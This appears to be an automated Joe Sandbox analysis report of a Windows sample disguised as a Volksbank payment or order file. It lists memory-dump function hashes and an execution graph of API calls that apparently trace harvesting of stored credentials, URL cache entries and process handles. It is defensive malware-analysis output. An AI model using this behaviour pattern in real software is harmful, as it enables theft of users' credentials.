• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: h#9/
• API String ID: 442123175-176419635
• Opcode ID: 912688a283d74bb403213a1b20f81e8a31614f7ec5ba81cff5fe5f92b7c55f56
• Instruction ID: 5da11f9ea4704e82f28e26a5dd5e353b9aa562483a05409a82424033567272ab
• Opcode Fuzzy Hash: 912688a283d74bb403213a1b20f81e8a31614f7ec5ba81cff5fe5f92b7c55f56
• Instruction Fuzzy Hash: 02318171B002199FDB24CF6DCC80999B7F9FF98311B5889AAE509D7350EB30A986CF50
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,34F49C64,?,00000000,?,00000000,00000000), ref: 34F497C3
• GetLastError.KERNEL32(?,34F49C64,?,00000000,?,00000000,00000000,?,00000000), ref: 34F497EC
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: h#9/
• API String ID: 442123175-176419635
• Opcode ID: 3f75f8985ec165b46186933f40cc063c037ca69580a1bbb0d090ecc2bd42c44d
• Instruction ID: d7d47f9e6ecf88b256ba4147bbf78d2c023627b3f61bf0b9dc571fbc25502ac8
• Opcode Fuzzy Hash: 3f75f8985ec165b46186933f40cc063c037ca69580a1bbb0d090ecc2bd42c44d
• Instruction Fuzzy Hash: 5621A075B002199FDB14CF69D880BD9BBF9EB48342F1408AAE946D7351DA30A982CF60
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 34F45F8A
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx$h#9/
• API String ID: 2568140703-2161119708
• Opcode ID: c11dff3f6ae2d2831cb7cdc6dd79e4b7661fbbdff454edb30d9e17544b2829e8
• Instruction ID: fa5c3efb3078b2bb4b01b7001c2aaafb34ad7de95eb7d77f356c3c61058d7c79
• Opcode Fuzzy Hash: c11dff3f6ae2d2831cb7cdc6dd79e4b7661fbbdff454edb30d9e17544b2829e8
• Instruction Fuzzy Hash: 2B01D332500249FBDF12AF94DC00EAE3F66EF48364F094554FE0826260CE329972AF95
APIs
• GetTickCount.KERNEL32 ref: 00405D9E
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040334E,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,76943420,0040359C), ref: 00405DB9
Strings
Memory Dump Source
• Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
• Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
• Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
• Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 34F45F02
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx$h#9/
• API String ID: 2593887523-2236687765
                                                                                                                                                                                                                                          • Opcode ID: 9708ca741223582d83de14761d73cd76a80879e23f37a1a2492c97582b128efd
                                                                                                                                                                                                                                          • Instruction ID: db43e63797e899b6d463481ff4632325c3c8a1f105d3f9b164da4d1122f13f2d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9708ca741223582d83de14761d73cd76a80879e23f37a1a2492c97582b128efd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF0E93158010CFBEF116F54DC00DAE7F65DF54310B194454FE0466350DE3199139ED5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                                                          • String ID: FlsFree$h#9/
                                                                                                                                                                                                                                          • API String ID: 3978063606-742199354
                                                                                                                                                                                                                                          • Opcode ID: a047a3f87085dac9790bda52080554c298a8c331445207f242ab1ff4153e0cdc
                                                                                                                                                                                                                                          • Instruction ID: 855740ec537c0afd2072f84cd264971b14618410cd1dd147b1071a1279431247
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a047a3f87085dac9790bda52080554c298a8c331445207f242ab1ff4153e0cdc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DE0E572A00118EBD3116B74DC04D7EBF64CF99A04B0D0599FE0567340DD318D138EDA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                                                                                          • String ID: FlsAlloc$h#9/
                                                                                                                                                                                                                                          • API String ID: 2773662609-3100467703
                                                                                                                                                                                                                                          • Opcode ID: 115e1ca5c2ca330ca7114f8ca65c793f6a983bc17ecfa8811d5a3d431b3488c7
                                                                                                                                                                                                                                          • Instruction ID: a63a0398ff89b63f2f06f7c68e9a7d756c221f2a3eaf563152a65466452ce11b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115e1ca5c2ca330ca7114f8ca65c793f6a983bc17ecfa8811d5a3d431b3488c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E0E535644218EBE3106B74EC04A6E7FA4DF98214B0908A8FE0567300CE215D038AD9

Execution Graph

Execution Coverage: 6.7%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 3.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 79
38861 4099c6 wcslen 38343->38861 38344 4456b2 38776 40b1ab free free 38344->38776 38346 40b2cc 27 API calls 38357 445a4f 38346->38357 38348 445be2 38347->38348 38359 40b2cc 27 API calls 38348->38359 38349 445d3d 38379 40b2cc 27 API calls 38349->38379 38350 445d88 memset memset memset 38362 414c2e 17 API calls 38350->38362 38790 409b98 GetFileAttributesW 38351->38790 38363 4459bc 38352->38363 38364 409d1f 6 API calls 38353->38364 38354 445879 38354->38330 38375 4087b3 338 API calls 38354->38375 38356->38302 38380 44594a 38356->38380 38738 409d1f wcslen wcslen 38357->38738 38369 445bf3 38359->38369 38361->38339 38372 445dde 38362->38372 38857 409b98 GetFileAttributesW 38363->38857 38374 445ce1 38364->38374 38365 445bb3 38864 445403 memset 38365->38864 38366 445680 38366->38344 38607 4087b3 memset 38366->38607 38378 409d1f 6 API calls 38369->38378 38370 445928 38370->38380 38791 40b6ef 38370->38791 38381 40b2cc 27 API calls 38372->38381 38881 409b98 GetFileAttributesW 38374->38881 38375->38354 38377 40b2cc 27 API calls 38386 445a94 38377->38386 38388 445c07 38378->38388 38389 445d54 _wcsicmp 38379->38389 38380->38307 38393 4459ed 38380->38393 38392 445def 38381->38392 38382 4459cb 38382->38393 38402 40b6ef 253 API calls 38382->38402 38743 40ae18 38386->38743 38387 44566d 38387->38300 38658 413d4c 38387->38658 38398 445389 259 API calls 38388->38398 38399 445d71 38389->38399 38462 445d67 38389->38462 38391 445665 38775 40b1ab free free 38391->38775 38400 409d1f 6 API calls 38392->38400 38393->38313 38393->38314 38394->38336 38394->38349 38394->38350 38395 445389 259 API calls 38395->38320 38404 445c17 38398->38404 38882 445093 23 API calls 38399->38882 38407 445e03 38400->38407 38402->38393 38403 4456d8 38409 40b2cc 27 API calls 38403->38409 38410 40b2cc 27 API calls 38404->38410 38406 44563c 38406->38391 38412 4087b3 338 API calls 38406->38412 38883 409b98 GetFileAttributesW 38407->38883 38408 40b6ef 253 API calls 38408->38336 38414 4456e2 38409->38414 38415 445c23 
38410->38415 38411 445d83 38411->38336 38412->38406 38777 413fa6 _wcsicmp _wcsicmp 38414->38777 38419 409d1f 6 API calls 38415->38419 38417 445e12 38423 445e6b 38417->38423 38430 40b2cc 27 API calls 38417->38430 38421 445c37 38419->38421 38420 4456eb 38426 4456fd memset memset memset memset 38420->38426 38427 4457ea 38420->38427 38428 445389 259 API calls 38421->38428 38422 445b17 38858 40aebe 38422->38858 38885 445093 23 API calls 38423->38885 38778 409c70 wcscpy wcsrchr 38426->38778 38781 413d29 38427->38781 38433 445c47 38428->38433 38434 445e33 38430->38434 38431 445e7e 38436 445f67 38431->38436 38439 40b2cc 27 API calls 38433->38439 38440 409d1f 6 API calls 38434->38440 38445 40b2cc 27 API calls 38436->38445 38437 445ab2 memset 38441 40b2cc 27 API calls 38437->38441 38443 445c53 38439->38443 38444 445e47 38440->38444 38446 445aa1 38441->38446 38442 409c70 2 API calls 38447 44577e 38442->38447 38448 409d1f 6 API calls 38443->38448 38884 409b98 GetFileAttributesW 38444->38884 38450 445f73 38445->38450 38446->38422 38446->38437 38451 409d1f 6 API calls 38446->38451 38750 40add4 38446->38750 38755 445389 38446->38755 38764 40ae51 38446->38764 38452 409c70 2 API calls 38447->38452 38453 445c67 38448->38453 38455 409d1f 6 API calls 38450->38455 38451->38446 38456 44578d 38452->38456 38457 445389 259 API calls 38453->38457 38454 445e56 38454->38423 38460 445e83 memset 38454->38460 38458 445f87 38455->38458 38456->38427 38464 40b2cc 27 API calls 38456->38464 38457->38320 38888 409b98 GetFileAttributesW 38458->38888 38463 40b2cc 27 API calls 38460->38463 38462->38336 38462->38408 38465 445eab 38463->38465 38466 4457a8 38464->38466 38467 409d1f 6 API calls 38465->38467 38468 409d1f 6 API calls 38466->38468 38469 445ebf 38467->38469 38470 4457b8 38468->38470 38471 40ae18 9 API calls 38469->38471 38780 409b98 GetFileAttributesW 38470->38780 38481 445ef5 38471->38481 38473 4457c7 38473->38427 38475 4087b3 338 API calls 38473->38475 38474 40ae51 9 API calls 38474->38481 
38475->38427 38476 445f5c 38478 40aebe FindClose 38476->38478 38477 40add4 2 API calls 38477->38481 38478->38436 38479 40b2cc 27 API calls 38479->38481 38480 409d1f 6 API calls 38480->38481 38481->38474 38481->38476 38481->38477 38481->38479 38481->38480 38483 445f3a 38481->38483 38886 409b98 GetFileAttributesW 38481->38886 38887 445093 23 API calls 38483->38887 38485->38282 38486->38288 38487->38282 38488->38280 38490 40c775 38489->38490 38889 40b1ab free free 38490->38889 38492 40c788 38890 40b1ab free free 38492->38890 38494 40c790 38891 40b1ab free free 38494->38891 38496 40c798 38497 40aa04 free 38496->38497 38498 40c7a0 38497->38498 38892 40c274 memset 38498->38892 38503 40a8ab 9 API calls 38504 40c7c3 38503->38504 38505 40a8ab 9 API calls 38504->38505 38506 40c7d0 38505->38506 38921 40c3c3 38506->38921 38510 40c877 38519 40bdb0 38510->38519 38511 40c86c 38963 4053fe 39 API calls 38511->38963 38512 40c7e5 38512->38510 38512->38511 38518 40c634 50 API calls 38512->38518 38946 40a706 38512->38946 38518->38512 39246 404363 38519->39246 38522 40bf63 39266 40440c 38522->39266 38523 40bdee 38523->38522 38527 40b2cc 27 API calls 38523->38527 38524 40bddf CredEnumerateW 38524->38523 38528 40be02 wcslen 38527->38528 38529 40bf5d LocalFree 38528->38529 38536 40be1e 38528->38536 38529->38522 38530 40be26 wcsncmp 38530->38536 38533 40be7d memset 38534 40bea7 memcpy 38533->38534 38533->38536 38535 40bf11 wcschr 38534->38535 38534->38536 38535->38536 38536->38529 38536->38530 38536->38533 38536->38534 38536->38535 38537 40b2cc 27 API calls 38536->38537 38539 40bf43 LocalFree 38536->38539 39269 40bd5d 28 API calls 38536->39269 39270 404423 38536->39270 38538 40bef6 _wcsnicmp 38537->38538 38538->38535 38538->38536 38539->38536 38540 4135f7 39285 4135e0 38540->39285 38543 40b2cc 27 API calls 38544 41360d 38543->38544 38545 40a804 8 API calls 38544->38545 38546 413613 38545->38546 38547 41361b 38546->38547 38548 41363e 38546->38548 38549 40b273 27 API calls 38547->38549 38550 
4135e0 FreeLibrary 38548->38550 38551 413625 GetProcAddress 38549->38551 38552 413643 38550->38552 38551->38548 38553 413648 38551->38553 38552->38311 38554 413658 38553->38554 38555 4135e0 FreeLibrary 38553->38555 38554->38311 38556 413666 38555->38556 38556->38311 39288 4449b9 38557->39288 38560 444c1f 38560->38292 38561 4449b9 42 API calls 38563 444b4b 38561->38563 38562 444c15 38565 4449b9 42 API calls 38562->38565 38563->38562 39309 444972 GetVersionExW 38563->39309 38565->38560 38566 444b99 memcmp 38571 444b8c 38566->38571 38567 444c0b 39313 444a85 42 API calls 38567->39313 38571->38566 38571->38567 39310 444aa5 42 API calls 38571->39310 39311 40a7a0 GetVersionExW 38571->39311 39312 444a85 42 API calls 38571->39312 38574 40399d 38573->38574 39314 403a16 38574->39314 38576 403a09 39328 40b1ab free free 38576->39328 38578 403a12 wcsrchr 38578->38301 38579 4039a3 38579->38576 38582 4039f4 38579->38582 39325 40a02c CreateFileW 38579->39325 38582->38576 38583 4099c6 2 API calls 38582->38583 38583->38576 38585 414c2e 17 API calls 38584->38585 38586 404048 38585->38586 38587 414c2e 17 API calls 38586->38587 38588 404056 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 404073 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 40408e 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 4040a6 38593->38594 38595 403af5 20 API calls 38594->38595 38596 4040ba 38595->38596 38597 403af5 20 API calls 38596->38597 38598 4040cb 38597->38598 39355 40414f memset 38598->39355 38600 404140 39369 40b1ab free free 38600->39369 38602 4040ec memset 38605 4040e0 38602->38605 38603 404148 38603->38366 38604 4099c6 2 API calls 38604->38605 38605->38600 38605->38602 38605->38604 38606 40a8ab 9 API calls 38605->38606 38606->38605 39382 40a6e6 WideCharToMultiByte 38607->39382 38609 4087ed 39383 4095d9 memset 38609->39383 38612 408809 memset memset memset memset memset 38613 40b2cc 27 API calls 38612->38613 38614 4088a1 38613->38614 38615 409d1f 6 API calls 38614->38615 
38616 4088b1 38615->38616 38617 40b2cc 27 API calls 38616->38617 38618 4088c0 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 4088d0 38619->38620 38621 40b2cc 27 API calls 38620->38621 38622 4088df 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4088ef 38623->38624 38625 40b2cc 27 API calls 38624->38625 38626 4088fe 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40890e 38627->38628 38629 40b2cc 27 API calls 38628->38629 38639 408953 38639->38366 38659 40b633 free 38658->38659 38660 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38659->38660 38661 413f00 Process32NextW 38660->38661 38662 413da5 OpenProcess 38661->38662 38663 413f17 CloseHandle 38661->38663 38664 413eb0 38662->38664 38665 413df3 memset 38662->38665 38663->38403 38664->38661 38667 413ebf free 38664->38667 38668 4099f4 3 API calls 38664->38668 39808 413f27 38665->39808 38667->38664 38668->38664 38669 413e1f 38670 413e37 GetModuleHandleW 38669->38670 38673 413e6a QueryFullProcessImageNameW 38669->38673 39813 413959 38669->39813 39829 413ca4 38669->39829 38670->38669 38672 413e46 GetProcAddress 38670->38672 38672->38669 38673->38669 38675 413ea2 CloseHandle 38675->38664 38677 414c2e 17 API calls 38676->38677 38678 403eb7 38677->38678 38679 414c2e 17 API calls 38678->38679 38680 403ec5 38679->38680 38681 409d1f 6 API calls 38680->38681 38682 403ee2 38681->38682 38683 409d1f 6 API calls 38682->38683 38684 403efd 38683->38684 38685 409d1f 6 API calls 38684->38685 38686 403f15 38685->38686 38687 403af5 20 API calls 38686->38687 38688 403f29 38687->38688 38689 403af5 20 API calls 38688->38689 38690 403f3a 38689->38690 38691 40414f 33 API calls 38690->38691 38697 403f4f 38691->38697 38692 403faf 39843 40b1ab free free 38692->39843 38694 403f5b memset 38694->38697 38695 403fb7 38695->38339 38696 4099c6 2 API calls 38696->38697 38697->38692 38697->38694 38697->38696 38698 40a8ab 9 API calls 38697->38698 38698->38697 38700 414c2e 17 API calls 38699->38700 38701 403d26 
38700->38701 38702 414c2e 17 API calls 38701->38702 38703 403d34 38702->38703 38704 409d1f 6 API calls 38703->38704 38705 403d51 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 403d6c 38706->38707 38708 409d1f 6 API calls 38707->38708 38709 403d84 38708->38709 38710 403af5 20 API calls 38709->38710 38711 403d98 38710->38711 38712 403af5 20 API calls 38711->38712 38713 403da9 38712->38713 38714 40414f 33 API calls 38713->38714 38719 403dbe 38714->38719 38715 403e1e 39844 40b1ab free free 38715->39844 38717 403dca memset 38717->38719 38718 403e26 38718->38354 38719->38715 38719->38717 38720 4099c6 2 API calls 38719->38720 38721 40a8ab 9 API calls 38719->38721 38720->38719 38721->38719 38723 414b81 9 API calls 38722->38723 38725 414c40 38723->38725 38724 414c73 memset 38727 414c94 38724->38727 38725->38724 39845 409cea 38725->39845 39848 414592 RegOpenKeyExW 38727->39848 38730 414c64 SHGetSpecialFolderPathW 38732 414d0b 38730->38732 38731 414cc1 38733 414cf4 wcscpy 38731->38733 39849 414bb0 wcscpy 38731->39849 38732->38346 38733->38732 38735 414cd2 39850 4145ac RegQueryValueExW 38735->39850 38737 414ce9 RegCloseKey 38737->38733 38739 409d62 38738->38739 38740 409d43 wcscpy 38738->38740 38739->38377 38741 409719 2 API calls 38740->38741 38742 409d51 wcscat 38741->38742 38742->38739 38744 40aebe FindClose 38743->38744 38745 40ae21 38744->38745 38746 4099c6 2 API calls 38745->38746 38747 40ae35 38746->38747 38748 409d1f 6 API calls 38747->38748 38749 40ae49 38748->38749 38749->38446 38751 40ade0 38750->38751 38754 40ae0f 38750->38754 38752 40ade7 wcscmp 38751->38752 38751->38754 38753 40adfe wcscmp 38752->38753 38752->38754 38753->38754 38754->38446 38756 40ae18 9 API calls 38755->38756 38761 4453c4 38756->38761 38757 40ae51 9 API calls 38757->38761 38758 4453f3 38760 40aebe FindClose 38758->38760 38759 40add4 2 API calls 38759->38761 38762 4453fe 38760->38762 38761->38757 38761->38758 38761->38759 38763 445403 254 API calls 38761->38763 38762->38446 
38763->38761 38765 40ae7b FindNextFileW 38764->38765 38766 40ae5c FindFirstFileW 38764->38766 38767 40ae94 38765->38767 38768 40ae8f 38765->38768 38766->38767 38770 40aeb6 38767->38770 38771 409d1f 6 API calls 38767->38771 38769 40aebe FindClose 38768->38769 38769->38767 38770->38446 38771->38770 38772->38331 38773->38310 38774->38406 38775->38387 38776->38387 38777->38420 38779 409c89 38778->38779 38779->38442 38780->38473 38782 413d39 38781->38782 38783 413d2f FreeLibrary 38781->38783 38784 40b633 free 38782->38784 38783->38782 38785 413d42 38784->38785 38786 40b633 free 38785->38786 38787 413d4a 38786->38787 38787->38300 38788->38303 38789->38356 38790->38370 38792 44db70 38791->38792 38793 40b6fc memset 38792->38793 38794 409c70 2 API calls 38793->38794 38795 40b732 wcsrchr 38794->38795 38796 40b743 38795->38796 38797 40b746 memset 38795->38797 38796->38797 38798 40b2cc 27 API calls 38797->38798 38799 40b76f 38798->38799 38800 409d1f 6 API calls 38799->38800 38801 40b783 38800->38801 39851 409b98 GetFileAttributesW 38801->39851 38803 40b792 38804 40b7c2 38803->38804 38805 409c70 2 API calls 38803->38805 39852 40bb98 38804->39852 38807 40b7a5 38805->38807 38809 40b2cc 27 API calls 38807->38809 38813 40b7b2 38809->38813 38810 40b837 CloseHandle 38812 40b83e memset 38810->38812 38811 40b817 38814 409a45 3 API calls 38811->38814 39885 40a6e6 WideCharToMultiByte 38812->39885 38816 409d1f 6 API calls 38813->38816 38817 40b827 CopyFileW 38814->38817 38816->38804 38817->38812 38818 40b866 38819 444432 121 API calls 38818->38819 38821 40b879 38819->38821 38820 40bad5 38823 40baeb 38820->38823 38824 40bade DeleteFileW 38820->38824 38821->38820 38822 40b273 27 API calls 38821->38822 38825 40b89a 38822->38825 38826 40b04b ??3@YAXPAX 38823->38826 38824->38823 38827 438552 134 API calls 38825->38827 38828 40baf3 38826->38828 38829 40b8a4 38827->38829 38828->38380 38830 40bacd 38829->38830 38832 4251c4 137 API calls 38829->38832 38831 443d90 111 API calls 38830->38831 
38831->38820 38855 40b8b8 38832->38855 38833 40bac6 39895 424f26 123 API calls 38833->39895 38834 40b8bd memset 39886 425413 17 API calls 38834->39886 38837 425413 17 API calls 38837->38855 38840 40a71b MultiByteToWideChar 38840->38855 38841 40a734 MultiByteToWideChar 38841->38855 38844 40b9b5 memcmp 38844->38855 38845 4099c6 2 API calls 38845->38855 38846 404423 38 API calls 38846->38855 38849 40bb3e memset memcpy 39896 40a734 MultiByteToWideChar 38849->39896 38850 4251c4 137 API calls 38850->38855 38852 40bb88 LocalFree 38852->38855 38855->38833 38855->38834 38855->38837 38855->38840 38855->38841 38855->38844 38855->38845 38855->38846 38855->38849 38855->38850 38856 40ba5f memcmp 38855->38856 39887 4253ef 16 API calls 38855->39887 39888 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38855->39888 39889 4253af 17 API calls 38855->39889 39890 4253cf 17 API calls 38855->39890 39891 447280 memset 38855->39891 39892 447960 memset memcpy memcpy memcpy 38855->39892 39893 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38855->39893 39894 447920 memcpy memcpy memcpy 38855->39894 38856->38855 38857->38382 38859 40aed1 38858->38859 38860 40aec7 FindClose 38858->38860 38859->38314 38860->38859 38862 4099d7 38861->38862 38863 4099da memcpy 38861->38863 38862->38863 38863->38365 38865 40b2cc 27 API calls 38864->38865 38866 44543f 38865->38866 38867 409d1f 6 API calls 38866->38867 38868 44544f 38867->38868 39980 409b98 GetFileAttributesW 38868->39980 38870 44545e 38871 445476 38870->38871 38872 40b6ef 253 API calls 38870->38872 38873 40b2cc 27 API calls 38871->38873 38872->38871 38874 445482 38873->38874 38875 409d1f 6 API calls 38874->38875 38876 445492 38875->38876 39981 409b98 GetFileAttributesW 38876->39981 38878 4454a1 38879 4454b9 38878->38879 38880 40b6ef 253 API calls 38878->38880 38879->38395 38880->38879 38881->38394 38882->38411 38883->38417 38884->38454 38885->38431 38886->38481 38887->38481 38888->38462 38889->38492 38890->38494 38891->38496 38893 414c2e 17 API calls 
38892->38893 38894 40c2ae 38893->38894 38964 40c1d3 38894->38964 38899 40c3be 38916 40a8ab 38899->38916 38900 40afcf 2 API calls 38901 40c2fd FindFirstUrlCacheEntryW 38900->38901 38902 40c3b6 38901->38902 38903 40c31e wcschr 38901->38903 38904 40b04b ??3@YAXPAX 38902->38904 38905 40c331 38903->38905 38906 40c35e FindNextUrlCacheEntryW 38903->38906 38904->38899 38908 40a8ab 9 API calls 38905->38908 38906->38903 38907 40c373 GetLastError 38906->38907 38909 40c3ad FindCloseUrlCache 38907->38909 38910 40c37e 38907->38910 38911 40c33e wcschr 38908->38911 38909->38902 38912 40afcf 2 API calls 38910->38912 38911->38906 38913 40c34f 38911->38913 38914 40c391 FindNextUrlCacheEntryW 38912->38914 38915 40a8ab 9 API calls 38913->38915 38914->38903 38914->38909 38915->38906 39173 40a97a 38916->39173 38919 40a8cc 38919->38503 38920 40a8d0 7 API calls 38920->38919 39178 40b1ab free free 38921->39178 38923 40c3dd 38924 40b2cc 27 API calls 38923->38924 38925 40c3e7 38924->38925 39179 414592 RegOpenKeyExW 38925->39179 38927 40c3f4 38928 40c50e 38927->38928 38929 40c3ff 38927->38929 38943 405337 38928->38943 38930 40a9ce 4 API calls 38929->38930 38931 40c418 memset 38930->38931 39180 40aa1d 38931->39180 38934 40c471 38936 40c47a _wcsupr 38934->38936 38935 40c505 RegCloseKey 38935->38928 38937 40a8d0 7 API calls 38936->38937 38938 40c498 38937->38938 38939 40a8d0 7 API calls 38938->38939 38940 40c4ac memset 38939->38940 38941 40aa1d 38940->38941 38942 40c4e4 RegEnumValueW 38941->38942 38942->38935 38942->38936 39182 405220 38943->39182 38947 4099c6 2 API calls 38946->38947 38948 40a714 _wcslwr 38947->38948 38949 40c634 38948->38949 39239 405361 38949->39239 38952 40c65c wcslen 39242 4053b6 39 API calls 38952->39242 38953 40c71d wcslen 38953->38512 38955 40c677 38956 40c713 38955->38956 39243 40538b 39 API calls 38955->39243 39245 4053df 39 API calls 38956->39245 38959 40c6a5 38959->38956 38960 40c6a9 memset 38959->38960 38961 40c6d3 38960->38961 39244 40c589 44 API calls 38961->39244 
38963->38510 38965 40ae18 9 API calls 38964->38965 38971 40c210 38965->38971 38966 40ae51 9 API calls 38966->38971 38967 40c264 38968 40aebe FindClose 38967->38968 38970 40c26f 38968->38970 38969 40add4 2 API calls 38969->38971 38976 40e5ed memset memset 38970->38976 38971->38966 38971->38967 38971->38969 38972 40c231 _wcsicmp 38971->38972 38973 40c1d3 35 API calls 38971->38973 38972->38971 38974 40c248 38972->38974 38973->38971 38989 40c084 22 API calls 38974->38989 38977 414c2e 17 API calls 38976->38977 38978 40e63f 38977->38978 38979 409d1f 6 API calls 38978->38979 38980 40e658 38979->38980 38990 409b98 GetFileAttributesW 38980->38990 38982 40e667 38983 40e680 38982->38983 38984 409d1f 6 API calls 38982->38984 38991 409b98 GetFileAttributesW 38983->38991 38984->38983 38986 40e68f 38987 40c2d8 38986->38987 38992 40e4b2 38986->38992 38987->38899 38987->38900 38989->38971 38990->38982 38991->38986 39013 40e01e 38992->39013 38994 40e593 38995 40e5b0 38994->38995 38996 40e59c DeleteFileW 38994->38996 38997 40b04b ??3@YAXPAX 38995->38997 38996->38995 38999 40e5bb 38997->38999 38998 40e521 38998->38994 39036 40e175 38998->39036 39001 40e5c4 CloseHandle 38999->39001 39002 40e5cc 38999->39002 39001->39002 39004 40b633 free 39002->39004 39003 40e573 39005 40e584 39003->39005 39006 40e57c CloseHandle 39003->39006 39007 40e5db 39004->39007 39079 40b1ab free free 39005->39079 39006->39005 39009 40b633 free 39007->39009 39010 40e5e3 39009->39010 39010->38987 39012 40e540 39012->39003 39056 40e2ab 39012->39056 39080 406214 39013->39080 39016 40e16b 39016->38998 39019 40afcf 2 API calls 39020 40e08d OpenProcess 39019->39020 39021 40e0a4 GetCurrentProcess DuplicateHandle 39020->39021 39025 40e152 39020->39025 39022 40e0d0 GetFileSize 39021->39022 39023 40e14a CloseHandle 39021->39023 39116 409a45 GetTempPathW 39022->39116 39023->39025 39024 40e160 